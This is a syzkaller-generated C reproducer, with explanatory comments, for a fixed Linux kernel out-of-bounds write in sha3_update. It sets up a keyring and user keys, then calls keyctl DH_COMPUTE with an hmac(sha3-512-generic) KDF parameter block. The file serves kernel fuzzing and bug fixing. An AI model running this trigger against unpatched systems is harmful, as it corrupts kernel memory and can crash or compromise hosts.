// KASAN: slab-out-of-bounds Write in sha3_update (2)
// https://syzkaller.appspot.com/bug?id=c01b681112a03bcbc81985e74fa084e0fdaf28b3
// status:fixed
// autogenerated by syzkaller (http://github.com/google/syzkaller)
#define _GNU_SOURCE
#include <sys/syscall.h>
#include <unistd.h>
#include <stdint.h>
#include <string.h>
// Raw syscall results kept for later calls: r[0] is the keyring created by the
// first add_key, r[1] and r[2] are the two "user" keys added to that keyring.
// loop() fills the array with 0xff bytes first, so a slot that is never
// assigned reads back as -1.
long r[3];
// Replays, once, the syscall sequence syzkaller recorded for the report named
// in the file header (KASAN slab-out-of-bounds write in sha3_update, marked
// status:fixed). The sequence is: map a fixed scratch region, create a keyring
// and two "user" keys in it, then issue keyctl operation 0x17 with a KDF
// parameter block whose hash name is "hmac(sha3-512-generic)".
//
// No syscall return value is checked. Every pointer below is a hard-coded
// address inside the scratch mapping, so the statement order and the exact
// addresses are part of the reproducer and must not be rearranged.
void loop()
{
// Start with every result slot set to -1 (all bytes 0xff).
memset(r, -1, sizeof(r));
// Scratch region: 0xfff000 bytes at 0x20000000, prot 0x3 (read|write),
// flags 0x32 (on Linux x86: MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS), fd -1.
// All argument buffers used below live inside this range.
syscall(__NR_mmap, 0x20000000ul, 0xfff000ul, 0x3ul, 0x32ul,
0xfffffffffffffffful, 0x0ul);
// Key 0: type "keyring" (8 bytes including the NUL), description "syz "
// written byte by byte (0x73 0x79 0x7a 0x20 0x00), no payload (NULL, length 0),
// destination keyring argument 0.
memcpy((void*)0x20f8bff8, "keyring", 8);
*(uint8_t*)0x20f36ffb = (uint8_t)0x73;
*(uint8_t*)0x20f36ffc = (uint8_t)0x79;
*(uint8_t*)0x20f36ffd = (uint8_t)0x7a;
*(uint8_t*)0x20f36ffe = (uint8_t)0x20;
*(uint8_t*)0x20f36fff = (uint8_t)0x0;
r[0] = syscall(__NR_add_key, 0x20f8bff8ul, 0x20f36ffbul, 0x0ul, 0x0ul,
0x0ul);
// Key 1: type "user", description "syz ", 2-byte payload 00 05, added to the
// keyring returned above (r[0]).
memcpy((void*)0x20337ffb, "user", 5);
*(uint8_t*)0x20394000 = (uint8_t)0x73;
*(uint8_t*)0x20394001 = (uint8_t)0x79;
*(uint8_t*)0x20394002 = (uint8_t)0x7a;
*(uint8_t*)0x20394003 = (uint8_t)0x20;
*(uint8_t*)0x20394004 = (uint8_t)0x0;
memcpy((void*)0x20e4effe, "\x00\x05", 2);
r[1] = syscall(__NR_add_key, 0x20337ffbul, 0x20394000ul, 0x20e4effeul,
0x2ul, r[0]);
// Key 2: type "user", description "syz#" (last byte 0x23), 192-byte (0xc0)
// payload, added to the same keyring.
memcpy((void*)0x20893000, "user", 5);
*(uint8_t*)0x20062000 = (uint8_t)0x73;
*(uint8_t*)0x20062001 = (uint8_t)0x79;
*(uint8_t*)0x20062002 = (uint8_t)0x7a;
*(uint8_t*)0x20062003 = (uint8_t)0x23;
*(uint8_t*)0x20062004 = (uint8_t)0x0;
memcpy((void*)0x20789ec7,
"\xb3\x3a\xb7\x00\x78\xeb\xe0\xd9\x4f\x72\x9c\xf8\x53\xe5\x20"
"\xc1\x9a\xd7\xd9\x7f\xe2\x17\x69\xe7\xc4\xdb\x44\xc2\x49\xb5"
"\x44\x23\x0b\xa2\x87\xfb\x8b\xd6\xed\x26\x6c\xcf\x59\xef\x70"
"\x99\x08\x00\x00\x00\xec\xd3\xff\xf3\x28\x53\x74\x7e\xda\x22"
"\xd2\x81\x8d\x08\xca\x27\xe0\xec\x82\x16\x20\xe3\x65\xa0\xe6"
"\xb9\x48\x5f\x2d\x92\x54\x93\xf6\x0c\x01\xe3\x3e\x5f\x8c\x7e"
"\xba\x67\xfc\x19\xa9\x49\x08\x00\x00\x00\xdf\x9d\x2e\x87\x5b"
"\x06\x6c\xd6\x40\xb3\x36\x61\x6f\xe0\xf3\xc3\x00\x28\x13\xb4"
"\x62\x7e\xe7\x59\x76\x89\x52\x5e\x8e\x81\xf7\x50\xa8\x6e\xb5"
"\x80\xfb\x46\x90\xea\x52\x24\x6b\xd3\xd3\x2b\x1a\x91\xf9\x44"
"\xed\xb7\x4b\x1f\x50\xae\x08\xc5\x38\x7e\xd8\x00\x00\x00\xa4"
"\x00\x57\x9f\x3a\xf3\xf8\x64\xe1\xc3\x24\xf6\x92\x8f\x66\x72"
"\xf9\x87\xca\x14\x9b\xe3\x1b\xd7\x8b\x6e\x8b\x96",
192);
r[2] = syscall(__NR_add_key, 0x20893000ul, 0x20062000ul, 0x20789ec7ul,
0xc0ul, r[0]);
// Three consecutive 32-bit key ids at 0x204c8ff4: r[1], r[2], r[1]. This
// matches the layout of struct keyctl_dh_params (private, prime, base) —
// confirm against linux/keyctl.h. r[] is long, so each store keeps only the
// low 32 bits; a failed add_key (-1) is stored as 0xffffffff.
*(uint32_t*)0x204c8ff4 = r[1];
*(uint32_t*)0x204c8ff8 = r[2];
*(uint32_t*)0x204c8ffc = r[1];
// Parameter block at 0x208e6fd4: two 64-bit pointers followed by nine zeroed
// 32-bit words. This matches struct keyctl_kdf_params (hashname, otherinfo,
// otherinfolen, eight spare words) — confirm against linux/keyctl.h.
// The first pointer targets the hash-name string written below; the second
// points at 0x20842000, which this function never writes.
*(uint64_t*)0x208e6fd4 = (uint64_t)0x20621fea;
*(uint64_t*)0x208e6fdc = (uint64_t)0x20842000;
*(uint32_t*)0x208e6fe4 = (uint32_t)0x0;
*(uint32_t*)0x208e6fe8 = (uint32_t)0x0;
*(uint32_t*)0x208e6fec = (uint32_t)0x0;
*(uint32_t*)0x208e6ff0 = (uint32_t)0x0;
*(uint32_t*)0x208e6ff4 = (uint32_t)0x0;
*(uint32_t*)0x208e6ff8 = (uint32_t)0x0;
*(uint32_t*)0x208e6ffc = (uint32_t)0x0;
*(uint32_t*)0x208e7000 = (uint32_t)0x0;
*(uint32_t*)0x208e7004 = (uint32_t)0x0;
// Copies exactly the 22 characters of the name and no NUL; the string is
// terminated only because the fresh anonymous mapping is zero-filled.
memcpy((void*)0x20621fea, "hmac(sha3-512-generic)", 22);
// keyctl operation 0x17 (23, KEYCTL_DH_COMPUTE in linux/keyctl.h) with the
// key-id triple, a 1-byte output buffer at 0x20c2cfff, and the parameter block
// above. The requested hash is presumably how the kernel reaches sha3_update,
// the function named in the report title; the root cause is not visible in
// this file. The result is discarded.
syscall(__NR_keyctl, 0x17ul, 0x204c8ff4ul, 0x20c2cffful, 0x1ul,
0x208e6fd4ul);
}
// Entry point: runs the recorded syscall sequence a single time, then exits
// with status 0 regardless of what the syscalls returned.
int main()
{
    loop();
    return 0;
}